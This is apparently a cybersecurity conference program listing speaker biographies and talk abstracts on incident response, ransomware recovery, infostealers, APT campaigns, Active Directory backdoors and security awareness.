Cybersecurity professional with a background in electronic engineering and several industry-recognized certifications. 20+ years of teaching experience at the most prestigious universities in Argentina. Has worked in the public and private sectors, including regional roles in global companies. He is in charge of R&D+i at BASE4 Security. Full Profile: https://www.linkedin.com/in/federicopacheco/

Defining deception strategies in production environments is a challenge that requires a strategic approach. This session introduces a practical methodology for translating Tactics, Techniques, and Procedures (TTPs) into concrete deception activities applicable to real-world scenarios. We will explore a four-phase process: behavior extraction, criteria selection, mapping TTPs to deception activities, and storytelling design. Attendees will leave with an approach for analyzing cyber threats, identifying adversary behaviors, selecting appropriate deception criteria, and designing narratives to enhance their deception strategies. By the end of the session, participants will be equipped with a guide to begin developing an effective cyber deception plan.

Jeffrey Carpenter has dedicated more than 35 years to improving the state of information security in roles such as incident responder, product security officer, information security officer and leader. He currently is the deputy CISO at Accuray, a medical device manufacturer. Jeffrey spent two decades at the CERT® Coordination Center, based at Carnegie Mellon University's Software Engineering Institute and he also was Senior Director of Incident Response Consulting and Threat Intelligence at Dell Secureworks. Jeffrey has been inducted into the Incident Response Hall of Fame by the Forum of Incident Response and Security Teams (FIRST).

Many incident response teams lack the real-world incident experience needed to confidently respond to attacks. This presentation demonstrates how to implement a weekly cyber drill program to build muscle memory and enhance incident response skills within your team. We will showcase how realistic scenarios, injected challenges, and post-drill analysis can cultivate practical expertise and improve incident response playbooks. A key focus will be how to leverage Large Language Models (LLMs) like Google Gemini and ChatGPT to accelerate and streamline the drill creation process. Attendees will learn how to design a weekly drill program, use AI to generate content, and drive improvements in their incident response process. Leave with ready to use drills, prompts and actionable knowledge that will help improve your teams capability and confidence. Targeted at incident response leaders and managers, but valuable for all team members.

Nicklas Keijser is a Senior Threat Analyst at Truesec, a role that involves much reverse engineering and looking into all things malware. Nicklas is also a subject matter expert in industrial control systems and anything related to its security. He started his career programming PLCs, SCADA systems, and almost anything else possible within the industry. Before joining Truesec, Nicklas worked at the Swedish National CERT in the Swedish Civil Contingencies Agency.

Anders is a Senior Infrastructure Architect with more than 25 years of experience in design and implementation of IT infrastructure. He�s one of only 301 people worldwide who have passed the VMware Certified Design Expert (VCDX) design and in-person panel defense, and he has also been awarded the VMware vExpert title every year from 2016 to present. Anders specializes in VMware vSphere security, covering both proactive security design and hardening as well as reactive incident response and forensics work.

All ransomware actors have now the capability to encrypt hypervisors that has led to some of the biggest attacks and brings down whole organisation. This talk will give in-depth insight how these attacks are performed, how to protect from them but also how detection and response can be accomplished, even thou it is not possible to install any agents on ESXi and vSphere, so they can be stopped.

Anton has over 13 years of experience in the cybersecurity field and has a wide area of expertise, including malware analysis, digital forensics, and incident response. He joined Kaspersky in 2011 as a malware analyst. He spent seven years at Kaspersky and had different positions across the company, such as senior digital forensics analyst and security researcher prior to moving to Sophos. During his Sophos years, Anton was working on the analysis and detection of emerging threats and in-house sandbox development to provide better detection capabilities for the customers. At Yandex, he was a part of the SOC team performing varieties of different tasks such as incident response and threat hunting. In addition, he worked closely with system administrators and various service teams to improve network visibility and make it easier for security engineers to catch suspicious activity inside the network. Currently, Anton performs full-cycle incident response as a Principal Security Consultant at CSIS Security Group.

There are plenty of resources on how to prepare, investigate and how to recover from critical incidents such as a ransomware attack, they are one of the most common attacks incident responders deal with. However, the resources are high-level, provide very few technical details or rely on adequate disaster recovery preparations. With modern ransomware attacks targeting hypervisors more frequently it is important for defenders to understand what the possible options are for recovery beyond some of the typical responses of paying a ransom or standing up a new environment. This research was carried out during the recovery stage of a recent incident in a customer's environment. During the research, several tools were identified which could aid an organizations recovery efforts but they have limited compatibility with ESXI hosts, so we had to develop a solution. The talk aims to provide hands-on experience of the manual recovery of partially encrypted Virtual Machines on an ESXI server and provide a step-by-step guide on how to recover.The talk is aimed to cover following topics:- Foundational knowledge you need to perform recovery of partially encrypted VMs by yourself (Virtual Machine Disks (VMDK) and partition table basics)- Step-by-step walkthrough of the actual case and the problems we overcame.- Hands-on approach to real world recovery and the difficulties which may arise- How to automate the process of recoveryWe will conclude with lessons learned from the research and the case we faced , and limitations of the approach.

Erlend Andreas Gjære has studied security and people for 15 years, including six years as a research scientist, with a focus on training, awareness and culture, behavior and incident response. In 2017, he became a tech-founder at Secure Practice, to help people with digital security at scale. He has delivered more than one hundred preparedness exercises across Norway and Denmark, through a tour concept of free events to increase cyber preparedness among thousands of small and medium enterprises, with support from the European Cybersecurity Competence Centre (ECCC), and winning the European Digital Skills Award 2024 for this effort.

Preparedness exercises allow people to engage first-hand with a cyber incident scenario, seeing how they respond to various situations and dilemmas. They help us learn how to better respond to a crisis, but will often highlight risks and vulnerabilities which are possible to immediately convert to preventive mitigations. When multiple companies exercise together, participants can also learn from each other, and even make new security friends.This talk summarizes what we've learned through national cyber exercise tours in Norway and Denmark, where 5000 people who are responsible for IT, security and preparedness from 3500 companies have participated since last year. We will describe key findings from discussions and input across a wide range of sectors, roles and locations participating. You will also learn useful tips and tricks for facilitating your own exercises, to create awareness and good learning moments for all of your colleagues -- whether they are part of an incident response team or not.

Olivier Bilodeau, a principal researcher at Flare, brings 12+ years of cutting-edge infosec expertise in honeypot operations, binary reverse-engineering, and RDP interception. Passionate communicator, Olivier spoke at conferences like BlackHat, DEFCON, SecTor, Derbycon, and more. Invested in his community, he co-organizes MontrèHack, is NorthSec's President, and runs its Hacker Jeopardy.

Nick Ascoli is a Senior Product Strategist at Flare and an experienced threat researcher who is recognized for his expertise in data leaks, reconnaissance, and detection engineering. Nick is an active member of the cybersecurity community contributing to open-source projects, regularly appearing on podcasts (Cyberwire, Simply Cyber, etc.) and sharing research and insights at conferences (GrrCON, B-Sides, DEFCON Villages, SANS, etc.)

Modern information stealers have evolved far beyond simple credential harvesters into sophisticated tools that capture complete digital fingerprints of their victims. This technical deep-dive unveils groundbreaking research into stealer architecture, attack chains, and defensive countermeasures. Through analysis of real-world compromise scenarios, including desktop screenshots captured at infection moments, we reveal how threat actors leverage compromised ad networks and trojanized software for mass deployment. The presentation examines the Operation Magnus takedown, a collaborative effort with ESET and law enforcement, demonstrating the complex infrastructure behind professional criminal enterprises.Building on hands-on experience with stealer log analysis, we detail how modern threats bypass multi-factor authentication, compromise password managers, and extract cryptocurrency wallets. We examine Chrome's application-bound encryption and why, although already circumvented, it creates new detection opportunities. The session concludes with practical defensive strategies and the release of two community resources: a PowerShell framework for automated credential testing against Entra ID and a curated dataset of stealer logs for security research.This presentation equips security practitioners with concrete insights and tools to defend against one of today's most consequential yet underexamined threats.

Emilien Le Jamtel has been a cyber security expert for the last 15 years. After building up his technical skills in penetration testing and red teaming, he joined CERT-EU in 2014 as a Threat Intelligence Analyst before quickly moving to CERT-EU's Digital Forensics and Incident Response team. Since 2021, he has been leading the DevSecOps team responsible for the infrastructure and tooling used by CERT-EU staff to deliver a wide range of services to all the european union entities. Emilien is a regular speaker at cybersecurity conferences such as FIRST, Hack.lu, Botconf, and NorthSec.

Mechanical keyboards are trendy and cherished not only by the gaming community but also among IT professionals. While they offer advanced customisation and productivity features, they can also introduce new risks for organisations. In this talk, we will dive into the fascinating world of mechanical keyboard enthusiasts and explore how these devices can be abused by threat actors. Topics will include threat modelling, supply chain attacks, firmware extraction, and a zero-trust approach to keyboard firmware security.

Sojun Ryu graduated from the 'Next Generation of Top Security Leader Program' (Best of Best, BoB) at the Korea Information Technology Institute (KITRI) in 2013, and holds a Master's degree in information security from Sungkyunkwan University in Korea. Sojun worked at KrCERT/CC for seven years, analyzing malware and responding to incidents, and is one of the authors of "Operation Bookcodes" published by KrCERT/CC in 2020. After moving to S2W, a cybersecurity startup in Korea, he expanded his coverage during his time as a team leader, focusing on not only APT but also on cybercrime. Sojun is now a member of GReAT at Kaspersky and is very focused on APT research.

Over recent years, the Lazarus APT group has distributed their own malware by leveraging fraudulent job opportunities targeting employees in various industries, including defense, aerospace, cryptocurrency, and other global sectors. This attack campaign is called DeathNote campaign and is also referred to as "Operation DreamJob".During our recent investigation, we observed that the Lazarus group had delivered archive files containing malicious files to at least two employees who were engaged with the same organization over the course of one month. The threat actor used a fake job offer sent by an impersonated recruiter.After looking into the attack, we were able to uncover a detailed infection chain, giving us insight into their intentions. Although they used known strategies and malware for initial infiltration, they intentionally introduced new malware to avoid detection by leveraging on the fact that the malware hasn't been used before. They have also stepped up their efforts to actively evade detection by exploiting legitimately compromised websites as C2 servers.

Masato Suzuki is engaged in service development and maintenance to provide Managed Security Services (MSS) for enterprises and municipalities. His experience includes researching advanced log analysis methods for ISPs and enhancing OSINT technologies for NTT Group's CSIRT as part of NTT-CERT. During the Tokyo Olympic and Paralympic Games, he conducted vulnerability testing and security audits, ensuring the security configuration of over 10,000 network and security devices.

Shota Sugawara leads the development and operation of Managed Security Services (MSS) for enterprises and municipalities, focusing on cloud security operations using AWS. His experience includes conducting vulnerability testing and ensuring the security of hundreds of IT systems owned by NTT East, Japan's largest telecom carrier. He is also actively involved in CTF competitions, specializing in Pwnable challenges.

Dr. Atsushi Kobayashi, SOC Manager at NTT-ME, has over 5 years of experience in cybersecurity. He was previously involved in research on traffic monitoring technology at NTT Laboratories, participated in the standardization work of IPFIX at IETF, and then wrote RFC5982, 6183, 7119, etc. After transferring to NTT East, he was engaged in the planning and maintenance of internal networks, integrating dozens of AD servers, renewing a VDI infrastructure and file servers for 50,000 users.

Dr. Hirofumi Kawauchi, SOC Manager at NTT-ME, has over 10 years of experience in cybersecurity. He previously led incident response and vulnerability management at NTT East, Japan's largest telecom carrier. He also worked as a SOC analyst and threat intelligence developer at NTT Security US. Upon returning to Japan, he launched NTT East's Managed Security Service as a tech lead, developing SOC infrastructure. He actively contributes to Japan's telecom industry and cybersecurity education through ICT-ISAC JAPAN, university lectures, and industry events. He has also presented at BSides Las Vegas. He holds CISSP, GCFA, GPEN, and AWS-SAP/SCS certifications. NTT Group Certified Security Principal, PhD in Engineering.

In our SOC, we leverage AWS-WAF to protect numerous client web servers, but we have taken it a step further. By integrating it with our proprietary threat intelligence, we have fully automated the process -- from detecting attacks to investigating and blocking them. In this presentation, we will share how we achieved this through: 1) Setting up custom rules to make AWS-WAF operations more effective and efficient, 2) Implementing an automated detection and blocking system, and 3) Presenting examples of these functions successfully countering actual cyber threats. This presentation will provide practical and actionable insights to enhance your day-to-day security operations.

Konstantin Zangerle is a member of KIT-CERT since November 2020. He started programming in python when the new thing was called Python 3000. After studying computer science in Karlsruhe, he loves to implement automation at KIT-CERT. In his job, he is fascinated by the fusion of infosec and law.

In 2023 he started to supervise multiple groups of students to implement Modern MISP. Until now, 35 students have been working on the project.

Efficient threat intelligence sharing across organisations is crucial for CSIRTs.Different software solutions are available, with MISP being the most commonly used tool.However, using MISP also comes with some challenges and limitations, e.g. MISP only supports MySQL/MariaDB and the OpenAPI specification is incomplete and in parts incorrect.Therefore, in Oct 2023, KIT-CERT started a reimplementation called Modern MISP that serves as a direct replacement, i.e. an existing database can be used, and the API provides the same endpoints.Modern MISP uses a modern software architecture with well-maintained libraries like FastAPI, Pydantic, SQLAlchemy, Svelte, and Celery.Currently Modern MISP supports CRUD Operations for Events, Attributes, Galaxies, Tags, and Users, and will most likely be production ready in April 2025.As Modern MISP tries to focus on widely used features, not all features of MISP will be implemented in Modern MISP.We provide an overview which features are already implemented in Modern MISP, the ongoing development and the plans for the next winter semester starting in October.

I have worked in IT for telecommunications, forestry, healthcare, retail and then 12 years in critical infrastructure where I built and lead Network Operations Center and Infrastructure Observability teams. Automation has always been part of every role I've ever had, ultimately performing it full-time on an "Automation Factory" where my favorite use-cases were cybersecurity. Security automation is not easy, or always obvious, but was the most rewarding. Automation is not just about doing things faster or more often, but how we can shift our focus to more meaningful work only humans can do. Mike Bunner lives in Seattle, WA, USA and currently works as a Senior Security Automation Engineer at a large outdoor retailer. When he's not automating, you'll find him skiing year-round on one of the regions many volcanoes.

Do you have more starred repos than you have time to think about? Are you a script or content builder seeing friction with integration and adoption of your work?Community software is innovative, responds quickly to emerging issues and is immediately accessible. But it's extremely disparate and operates ad-hoc. SOAR attempts to solve this with closed ecosystems, but at the cost of vendor lock-in.In this presentation we will demonstrate how we as script builders, implementers and data providers can build a more cohesive open source ecosystem with the adoption of Open Cybersecurity Schema Framework (OCSF) and Elastic Common Schema (ECS).Adoption of a standard schema brings your work into a predictable ecosystem and production readiness. Standards allow us to chain our tooling with less integration overhead, increasing the likelihood of seeing our tools put into production.See how a single object in OCSF can enable automation across threat hunting, EDR, software removal, email gateways, firewalls, and 3rd party registries.

Tammy is a Senior Threat Intelligence Researcher and Certified Dark Web Investigator at Flare. She is a contributor and volunteer threat intelligence researcher for the open-source project RansomLook. When not working on threat intelligence, she listens to techno and ambient music. Her other hobbies include street and nature photography, reading, camping, hiking, and learning about theoretical astrophysics, hypothetical stars, and exotic forms of matter.

This talk explores various techniques, tactics, and psychological models used to infiltrate emerging threat actor groups. We will examine the process of target identification and discuss when it is appropriate to attempt infiltration. Additionally, we take a closer look at the concept of probing the enemy and the idea of weaponizing new relationship energy (NRE), which can be effective at destabilize individuals and placing them outside of their comfort zones. An important aspect of Persona Theory is not only what we write but also how we present it. Stylometric analysis can be particularly useful in this area. We will compare transliteration and translation (both human and machine) to understand how to pass as a native speaker.

Mr. Millar has served in CISA since 2009, working to strengthen the nation's cyber defenses and resilience against emerging threats. His work has included increasing the level of public, private and international partner engagement, and supporting initiatives to improve information sharing, such as the standardization of the Traffic Light Protocol. As the Branch Chief of Cyber Resilience within the Cyber Security Division, he oversees CISA's architectural cybersecurity assessments, the Cybersecurity Performance Goals program, and training and standards for assessment performance. Prior to his cybersecurity career, he served as a linguist with the 22nd Intelligence Squadron of the United States Air Force. Mr. Millar holds a Master's of Science from the George Washington University and is a Distinguished Graduate of the National Defense University's College of Information and Cyberspace.

Eireann Leverett is the CTO of Killara Cyber, and a long time to collaborater to FIRST. He has risen through the roles of penetration tester, incident responder, researcher, and risk analyst to his current role. He has written many articles and one book, and has a deep interest in critical infrastructure, technology and risk, and catastrophe economics. He's like the little kid on this panel of international experts, and excited to be at the table!

Wendy Nather has been working in cybersecurity for over 25 years. She was previously the Director of Advisory CISOs at Duo Security, Research Director at the Retail ISAC, and Research Director of the Information Security Practice at 451 Research. Wendy led IT security for the EMEA region of the investment banking division of Swiss Bank Corporation (now UBS), and served as CISO of the Texas Education Agency. She was inducted into the Infosecurity Europe Hall of Fame in 2021. Wendy serves on the board of directors for Sightline Security, is on the steering committee for the IST Ransomware Task Force, and is a Senior Fellow at the Atlantic Council's Cyber Statecraft Initiative.

Hendrik Adrian is the representative of FIRST Team LACERT and FIRST CTI SIG and FIRST NETSEC co-chair, he is working as cyber threat intrusion senior analyst at Cyber Emergency Center. Hendrik works as Japan government support for various educational security lecture activities in IPA i.e. Security Camp, CyberCREST, and he is putting more efforts in national and international security communities as an active lecturer and speaker in various conferences. His known malware analysis contributed to the security community is listed in the Wikipedia at https://en.wikipedia.org/wiki/MalwareMustDie

As threat actors become increasingly focused on disruptive incidents (ransomware being only one example) and such incidents increasingly becoming a matter of "when, not if," defenders must be increasingly prepared not only to rapidly minimize harm, but to quickly and safely recover after a disruption. This panel of experts from around the world will discuss lessons learned in cyber resiliency, including supply chain risk management, cyber hygiene, trustworthy ad hoc side channels, individual versus collective resilience (and the need for stronger collaboration), metrics for assessing resilience, and more. In addition, panelists will have an opportunity to share "war stories" of cyber resilience in the current threat context, so that all attendees can learn from the triumphs of other resilient teams.

Hikohiro Lin had been in charge of Product Security at Panasonic headquarters for over 15 years. He led several projects, including devising and deploying security test methods and risk assessments for IoT devices, formulating product security standard rules and guidelines, building a global product security system, formulating head office product security strategies, establishing Panasonic Cyber Security Lab for future cybersecurity research and product-focused security incident responses team, etc. He had served as Head of Panasonic PSIRT, Head of Product Security at Panasonic Global, and Director of Panasonic Cyber Security Laboratory.Also, He has received (ISC)² ISLA(Information Security Leadership Achievement)APAC Senior Information Security Professional 2018 Showcased Honoree and Community Service Star. He is Review Board member of HITCON and HITB(Hack In The Box) and a much used cyber security speaker at many international conferences such as Black Hat, CODE BLUE, Kaspersky Security Analyst Summit (SAS),HITCON and Government invited roundtable Panelist. He is currently appointed to Sr. Executive Officer of GMO Cybersecurity by IERAE, Inc.

Ken Lee is a security professional who serves as both an Independent Security Advisor and a Security Consultant at Amazon Web Services. He provides vulnerability response and cloud security governance consulting expertise in his independent role. Prior to AWS, Ken was the Product Security Officer at Synology, where he led the Bug Bounty Program and Security Incident Response Team, overseeing critical security operations across the organization. Ken's industry leadership includes serving on the program committee of the 36th Annual FIRST Conference. He has been an active contributor to the security community, sharing his expertise in Product Security and CVE Program management through speaking engagements and community initiatives.

Kosuke Ito is an IoT security expert with over 15 years of experience and was the first PSIRT leader founding the product security activities at JVCKENWOOD Corp. before joining GMO Cybersecurity by IEARE. He had led several projects to found the basic security activities, including formulating corporate product security policy, strategies and product security standard rules and guidelines including deployment of security test methods and risk assessments for IoT devices, formulating product security incident response system (PSIRT) and guidelines, and developing the product security educational materials and delivering seminars group-wide, etc. He had played a key role in promoting group-wide product security at JVCKENWOOD. He also founded a manufacturing industry-wide product security promotion council and played a key role in developing the IoT security certification program, the first in Japan.

As organizations grapple with increasingly complex software supply chains and an exponential rise in security vulnerabilities, traditional PSIRT operations are becoming unsustainable. The challenge is particularly acute for organizations managing IoT devices and embedded systems, where vulnerability management requires coordinated efforts across multiple stakeholders and complex supply chains.Following our previous analysis of manufacturing industry's cybersecurity readiness presented in FIRSTCON 2024, this session presents PSIRT 2.0, a strategic solution addressing the key challenges identified in our survey. With approximately 40% of manufacturers struggling with vulnerability management and resource constraints, there's a clear need for a more efficient and scalable approach to product security.PSIRT 2.0 represents a paradigm shift from traditional manual operations to an intelligent, automated platform enabling organizations to manage product security across their supply chains effectively. This session will explore how this evolution addresses the manufacturers' specific challenges, particularly in meeting new regulatory requirements and managing security throughout the product life cycle. Building on real-world insights from manufacturers, we'll demonstrate how PSIRT 2.0 can help organizations transform their product security operations while optimizing resources and improving supply chain collaboration.

Emilien Le Jamtel has been a cyber security expert for the last 15 years. After building up his technical skills in penetration testing and red teaming, he joined CERT-EU in 2014 as a Threat Intelligence Analyst before quickly moving to CERT-EU's Digital Forensics and Incident Response team. Since 2021, he has been leading the DevSecOps team responsible for the infrastructure and tooling used by CERT-EU staff to deliver a wide range of services to all the european union entities. Emilien is a regular speaker at cybersecurity conferences such as FIRST, Hack.lu, Botconf, and NorthSec.

Francien has a multidisciplinary and legal background with a focus on cybersecurity law and policy. She began her European Commission journey as a trainee working on the Cyber Resilience Act and NIS2. For the past 1.5 years at CERT-EU, Francien has worked on implementing the recently enacted cybersecurity regulation and addressing legal questions arising from CERT-EU's operations.

Marton holds an IT engineering degree and began his career as a sysadmin before transitioning into cybersecurity. With over 15 years of experience, including 10 years working with Union entities, Marton is committed to contributing to a safer cyberspace. He currently works in the Security Consultation team of CERT-EU, whose tasks is, besides many others, to raise cybersecurity awareness among the staff of the European Union entities.

In 2020, CERT-EU created RE(HACK)T, a board game designed to support security awareness sessions for European Union entities. After several years of successfully conducting awareness sessions with dozens of users and distributing the game to hundreds of colleagues across EU organisations, CERT-EU decided to open-source all game files and assets. This initiative aims to help other organisations enhance their security awareness efforts.

In 2020, CERT-EU created RE(HACK)T, a board game designed to support security awareness sessions for European Union entities. After several years of successfully conducting awareness sessions with dozens of users and distributing the game to hundreds of colleagues across EU organisations, CERT-EU decided to open-source all game files and assets. This initiative aims to help other organisations enhance their security awareness efforts.In this talk, we will introduce the game, explain its rules and assets, and share insights into the open-sourcing process, including the selected licence. Finally, we will share lessons learned from delivering awareness sessions to EU entity users, providing practical tips and future improvement ideas.

Steve is a tech lead within Stripe's Security Analytics and Detection team focused on scaling detection and response. He started his career 15+ years ago at Cisco in security engineering, architecture, and solving large scale threat analytics problems. When not working, he enjoys hiking, hacking on side projects, and woodworking.

Lauren is a program manager supporting Stripe's security team focused on supporting complex, large-scale work. Lauren has been doing security related work for nearly 10 years starting as an auditor then moving into the GRC space. When she's not thinking about security, you'll probably find her reading or doing ceramics.

Over the past two years, Stripe leveraged a prevention-first approach to harden our laptops. We combined insights from response investigations and known threat actor tactics, techniques, and procedures (TTPs) to systematically eliminate classes of attack techniques. By focusing on prevention, Stripe has reduced workload on analysts, eliminated the need for some detection mechanisms, minimized response toil, and freed up time to expand capabilities. This talk will cover our work with Chrome and macOS, discussing how we went from idea to production rollout while prioritizing minimal friction for employees. We will touch on several projects, but focus on allowlisting for Chrome extensions and macOS applications. Attendees will gain insight into how Stripe successfully implemented these changes with a data driven approach coupled with building trust and relationships across multiple teams and the company at large. We will talk about what went well, what we learned, and what changed along the way.

Justin Page is a leader in cybersecurity innovation and the head of Booz Allen Hamilton's DarkLabs Applied Research, with over 20 years of experience in delivering advanced solutions to complex security challenges. He and his team developed multiple agentic systems for cybersecurity challenges from compliance to detection and automated static reverse engineering. His expertise includes intrusion analysis, malware analysis, threat hunting, and cyber threat intelligence against Nation-State Advanced Persistent Threats (APTs) across government and commercial sectors.

Malware analysis is critical for defending against cyber threats, but traditional approaches are often too slow and resource-intensive for modern needs. This talk explores how agentic AI can transform malware reverse engineering by automating repetitive tasks, improving scalability, and delivering actionable insights more efficiently. Drawing on the experience of designing and implementing an AI-driven system for malware analysis, we'll share key lessons learned, including best practices for agent collaboration, system scalability, and integration with existing tools. Attendees will gain practical strategies for applying these concepts in their own environments, as well as insights into the future of AI in cybersecurity. This session is ideal for professionals interested in enhancing malware analysis workflows and advancing their understanding of AI applications in security.

Increasingly the enterprise digital assets are located outside the organization perimeter. Therefore, routing security becomes a critical requirement of security the supply chain. To increase awareness and participation among enterprises, a second, elevated tier of MANRS (https://www.manrs.org) participation is being developed that requires connectivity providers to comply with more stringent provisions and auditing – MANRS+. It creates a stronger business case for routing security for providers while engaging their customers by raising awareness, generating demand, and providing necessary tools for security assurance. It is a compact set of routing security controls and audit requirements that can be embedded in common infosec frameworks and referenced in procurement practices. This talk will talk about strengthening security for enterprises and their connectivity providers.

Takahiro works as the operational leader of MBK-CSIRT at Mitsui & Co., Ltd His responsibilities cover a wide range of tasks, including planning the cybersecurity strategy for the entire Mitsui & Co. group, a global conglomerate, designing measures in line with the strategy, project management for implementing these measures, managing cybersecurity operations, and leading incident response. In his previous job, he worked at a security vendor, where he was mainly involved in security assessments, penetration testing, and other technical consulting services related to PCI DSS for clients in the credit card industry.

Mitsui & Co., Ltd, a leading "Sogo Shosha" (a Japanese conglomerate engaged in trading and business investment), manages a global network of approximately 500 consolidated group companies. This extensive reach means protecting a wide range of businesses. MBK-CSIRT (MBK stands for Mitsui & Co.) operates with a dual mandate, functioning as both the internal CSIRT for Mitsui & Co. and the group CSIRT for its affiliates. This involves daily coordination of incidents across the group, ensuring a unified response to cybersecurity threats. In this session, I will present several distinctive incident cases within the Mitsui & Co. group, highlighting challenges, response strategies, and outcomes. Additionally, I will introduce lessons learned and security enhancements, including the expansion of MBK-CSIRT, establishment of group cybersecurity standards, and formation of a global cyber insurance policy. The session will conclude with reflections on the journey from chaos to control, emphasizing a proactive and coordinated approach to cybersecurity.

Cornelia is a security awareness & communications expert at Switch-CERT, advocating for a human-centred approach to security. She supports various communities to become better security advocates and thereby empower people to improve their digital literacy and be safe online. Cornelia is educated to postgraduate level in corporate and political communications and has a background in teaching. Cornelia co-chairs the FIRST SIG Human Factors in Security.

In the age of AI, social engineering (SE) attacks have become more sophisticated than ever. AI-generated deepfakes and flawlessly crafted phishing emails make it impossible to rely on familiar cues like voice, images, or writing styles. Yet traditional security awareness training still focuses on teaching users to spot specific signs -- an approach that assumes rational, System 2 thinking. The reality? SE attacks succeed by exploiting emotional, reactive System 1 thinking, making existing training methods increasingly ineffective.This talk introduces a different type of approach. Instead of relying on rule-based detection, we focus on meta-level awareness: teaching users the adversarial mindset so they understand how they're being targeted and manipulated. Drawing on Cialdini's principles of influence and incorporating mindfulness techniques, this approach equips users to pause, recognize emotional triggers, and respond rationally. Attendees will leave with actionable insights to build a resilient, human-centred defence against SE attacks.

Sylvain Cortes is an international expert in identity and access management (IAM) and cybersecurity. During his career, he has mainly worked with large organizations to carry out identity or directory governance projects, including authentication processes, inter-OS privilege management, cloud identity management and Active Directory cybersecurity. He has developed a deep expertise in Active Directory security and backdooring concept. Sylvain is the president of CADIM, a French non-profit organization that organizes an annual event in Paris dedicated to identity management and cyber security: www.identitydays.com. Sylvain is a speaker for various events such as: Blackhat, Cloud Expo, IdentityDays, FS-ISAC, aOS, IT Nordics, Les Assises de la S�curit�, FIC, etc. For 18 years, Sylvain has been recognized by Microsoft as a Microsoft MVP on Active Directory & Security.

What is the hardest question to answer after an Active Directory attack? It's very simple: "Do I have a backdoor in my directory after this attack?"In this session, we will present the state of the art regarding backdoors in AD, with concrete examples of simple and advanced techniques working from AD 2003 to AD 2025 and ensuring attackers' group persistence. We will cover AD backdoors in general, then go into detail about backdooring techniques targeting SIDhistory, Managed by, gPLink, GPOs, ACEs, and more.Finally, we'll look at the combination of multiple techniques used to hide leads and make persistent attackers virtually undetectable.

Jan has been an Advisory Board Member of Europol's European Cybercrime Centre (EC3) from 2013-2018 and has been an advisor on numerous major international security incidents, such as WannaCry, Petya, etc. With over 25 years' experience in IT-security (including network architecture, forensics, incident response, malware research, penetration testing and financial fraud), Jan frequently appears on Danish TV as a cybersecurity subject-matter expert. Jan regularly presents at regional and international cyber security conferences, in addition to hosting the annual Copenhagen Cybercrime Conference.

Michael Sjøberg leads hostage negotiation and crisis management consultancy Human Advisor Group. Michael has worked professionally with crisis management and negotiations since 2001 - he is an army captain (ret.) and holds a Master's Degree in International Relations with complex risk management, crisis negotiations and strategic handling of high profile political hostage takings as his specialty. He is a trained hostage negotiator by ways of New Scotland yard. Michael is frequently used in Scandinavian media as subject matter expert on kidnap situations and hostage negotiations and advises a number of clients in the financial and energy sectors.

There are many opinions when it comes to communicating and even negotiating with Threat Actors (TA). Often, the victim is strongly recommended NOT to engage with the TA. This talk will give you a unique insight into examples from real-life cases where TA communication assisted the technical investigation and vice-versa. The talk will include technical and strategic elements within Incident Response, and you will understand why TA communication is not the same as paying a ransom. In fact, sometimes, TA communication is the only way to understand the entire risk set associated with the incident.

Lindsay Kaye is the Vice President of Threat Intelligence at HUMAN Security. Her technical specialty spans the fields of malware analysis and reverse engineering, with a keen interest in dissecting custom cryptographic systems. Prior to her work at HUMAN, Lindsay served as Senior Director of Advanced Reversing, Malware, Operations and Reconnaissance as part of the Insikt Group at Recorded Future. She has proposed, won funding for and led research projects, particularly during her time at The MITRE Corporation. Outside of work, Lindsay writes articles on complex cybersecurity issues including data and trends analysis, technical pieces on reverse engineering and TTPs, and discussions on the business of the cybercriminal underground. Lindsay is an internationally-recognized cybersecurity speaker and author. She holds a BS in Engineering with a Concentration in Computing from Olin College of Engineering and an MBA from Babson College.

Gavin Reid serves as the CISO for HUMAN Security, a cybersecurity company that specializes in safeguarding enterprises from digital attacks while preserving digital experiences for users. In addition, he leads the Satori Threat Intelligence and Research Team as VP of Threat Intelligence. Gavin began his cybersecurity career in information security at NASA's Johnson Space Center. He later went on to create Cisco's Security Incident Response Team (CSIRT), Cisco's Threat Research and Communications (TRAC), and Fidelity's Cyber Information Group (CIG). Before joining HUMAN, Gavin served as the CSO for Recorded Future, where he was responsible for ensuring the protection, integrity, confidentiality, and availability of all customer-facing services, internal operational systems, and related information assets. For more than 20 years, Gavin has managed every aspect of security for large enterprises.

Evil twins can be the topic of science fiction, tales of mystery and... advertising fraud? We uncovered a sophisticated ad fraud campaign, that we dubbed Konfety, involving over 250 Android apps in which each benign app distributed via the Play Store had an "evil twin" adware app counterpart - and its corresponding infrastructure. We will explain how Konfety was able to effectively create its own malicious ecosystem, from their ad SDK to their malicious infrastructure that could be started and scaled to support the evil twins at the press of a button to reselling ad inventory to make money, and provide a technical overview of how they did it. While Konfety is an ad fraud campaign, at its core, the distribution of the malicious twin applications was done via drive-by malvertising, broadening the scope and impact of the campaign past the mobile ecosystem. During this talk, we will also explain how we conducted this investigation, and others like it, including how we discovered the novel "evil twin" technique, and provide insight into our investigative framework. We will also provide guidance for how to incorporate threat intelligence and threat hunting investigation techniques into your own organization, even without having a threat intelligence team.

Anthony has over 24 years of experience in cybersecurity and the last 17 years focused on nation state and sophisticated adversaries. Anthony developed the Cyber Hunt program at Johns Hopkins Applied Physics Laboratory and current manages the Cyber Hunt, Applied Cyber Research, and Architecture & Engineering.

Matt has over 13 years of experience in cybersecurity and is the Lead Reverse Engineer in the Applied Cyber Research team at Johns Hopkins Applied Physics Lab. Matt performs malware analysis and uses behavioral indicators to proactively hunt for malicious activity in the enterprise.

This presentation will discuss some of the limitations with traditional SIEM’s and how cybersecurity is evolving away from them. We continue to describe threat hunting and detection engineering with a more iterative and scalable methodology than typically used with traditional SIEM’s. We will be examining the use of Python, Pandas, and other libraries in Jupyter notebooks to gain additional visibility and analyses into adversarial activities. We will demonstrate how this approach can work in cyber operations and give examples of the entire process including code examples. We will wrap up by discussing how this can be achievable by analysts without python and data science backgrounds.

Sathwik Ram Prakki works as Senior Security Researcher at Seqrite Labs, Quick Heal. His areas of research are threat intelligence, APT hunting, delving into dark web and malware analysis. With a background in offensive security and knowledge of OS internals, he is keen on enhancing detections and infrastructure for threat hunting and CTI. Starting his cybersecurity career at C-DAC, under the Ministry of Electronics & IT in India, Sathwik has shared insights on APTs, ransomware and malware ecosystems at conferences such as AVAR, Botconf, c0c0n, and Virus Bulletin.

Subhajeet is working as a Security Researcher in Security Labs at Quick Heal. His areas of focus are threat intelligence, research along with reverse engineering to improve detection capabilities and to aid in further research.

